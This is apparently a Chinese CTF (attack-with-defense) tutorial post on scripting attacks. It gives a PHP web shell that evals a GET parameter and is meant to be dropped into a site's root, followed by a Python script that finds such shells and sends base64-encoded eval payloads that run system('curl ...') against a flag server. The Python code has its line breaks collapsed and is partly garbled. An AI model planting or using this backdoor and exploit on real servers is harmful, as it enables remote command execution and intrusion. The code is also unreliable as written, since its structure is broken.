AWD脚本编写_1

shell.php（放在网站根目录下）

<?php
error_reporting(0);
eval($_GET["yanxiao"]);
?>

脚本编写成功

 

后门文件利用与解析

import requests
import base64def get_flag(url, flag_url, method, passwd, flag_path):cmd = "curl " + flag_url  # 修复命令拼写错误get_cmd = "echo system(\"%s\");" % cmddata = {}data[passwd] = "@eval(base64_decode($_POST['z0']));"data['z0'] = base64.b64encode(get_cmd.encode('utf-8')).decode('utf-8')  # 修复编码错误if method == "get":url = "http://" + url + "/" + flag_path  # 修复 URL 格式try:res = get_re(url)except Exception as e:print(f"{url} connection_timeout: {e}")return 0if res.status_code != 200:print(f"{url} webshell not found")return 0else:print(f"{url} webshell is found")elif method == "post":try:res = post_re(url, data)  # 传递 data 参数print(res.content)  # 打印响应内容except Exception as e:print(f"{url} connection_timeout: {e}")return 0if res.status_code != 200:print(f"{url} webshell not found")return 0else:print(f"{url} webshell is found")def get_re(url):res = requests.get(url=url, timeout=5)return resdef post_re(url, data):  # 添加 data 参数res = requests.post(url=url, data=data, timeout=5)return resurl = "127.0.0.1"
flag_url = "http://192.168.45.1"
method = "get"
passwd = "yanxiao"
flag_path = "shell.php"get_flag(url, flag_url, method, passwd, flag_path)#http://127.0.0.1/shell.php webshell is found